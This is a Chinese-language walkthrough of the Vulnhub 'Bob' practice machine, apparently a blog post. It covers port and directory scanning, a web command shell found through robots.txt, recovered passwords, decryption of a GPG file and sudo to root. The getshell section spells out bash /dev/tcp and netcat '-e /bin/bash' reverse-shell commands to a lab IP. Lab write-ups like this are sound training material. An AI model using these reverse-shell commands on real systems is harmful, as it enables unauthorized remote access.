Vulnhub靶机Bob_v1.0.1 writeup

下载地址:https://www.vulnhub.com/entry/bob-101,226/
在这里插入图片描述

信息搜集

扫描IP地址

在这里插入图片描述

扫描端口及端口信息

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-h1PmvMJi-1645192295721)(assets/image-20220104222359-a5l6wo1.png)]
访问80端口并没有发现有用的信息

扫描目录

在这里插入图片描述
看到有熟悉的robots.txt,访问看一下
在这里插入图片描述
发现了dev_shell.php,可以执行一些简单的命令,但是不能执行ls,ifconfig,pwd等命令
在这里插入图片描述

getshell

bash反弹shell
bash -c 'exec bash -i &>/dev/tcp/192.168.1.140/4444 <&1'
nc发送一个shell到本地
/bin/nc 192.168.1.140 4444 -e /bin/bash

查看用户,看到一共有六个用户拥有登录权限
在这里插入图片描述
在bob的家目录里的.old_passwordfile.html文件看到了jc用户和seb用户的密码
在这里插入图片描述
尝试使用这两个用户登录
在这里插入图片描述
这两个用户也没有啥特殊的权限
继续查看bob家目录的文件,从桌面开始找,刚找到Documents就发现了一些小惊喜,login.txt.gpg
在这里插入图片描述
既然有GPG密文的文件,肯定会有解密的密钥
查看一下,还有个文件夹Secret,进去继续摸索
一路向下,来到最后一个文件,查看到一个名字为notes.sh的文件
在这里插入图片描述
没发现啥有用的信息,执行一下notes.sh这个脚本
在这里插入图片描述
仔细观察执行出来的这个结果,发现每一行都有一个大写的字母
将每一行的大写字母都提取出来 HARPOCRATES
回到login.txt.gpg的地方输入密码解密

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

在这里插入图片描述

提权

找到了bob用户的密码,使用bob用户登录,直接sudo su提权到root
在这里插入图片描述
成功获取根目录下的flag
在这里插入图片描述
到这里成功完成了该靶机!
本文所有用到的工具都可以关注微信公众号“网络安全学习爱好者”联系公众客服免费领取!有关学习的问题也可以加客服一起学习!
在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sword-豪

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值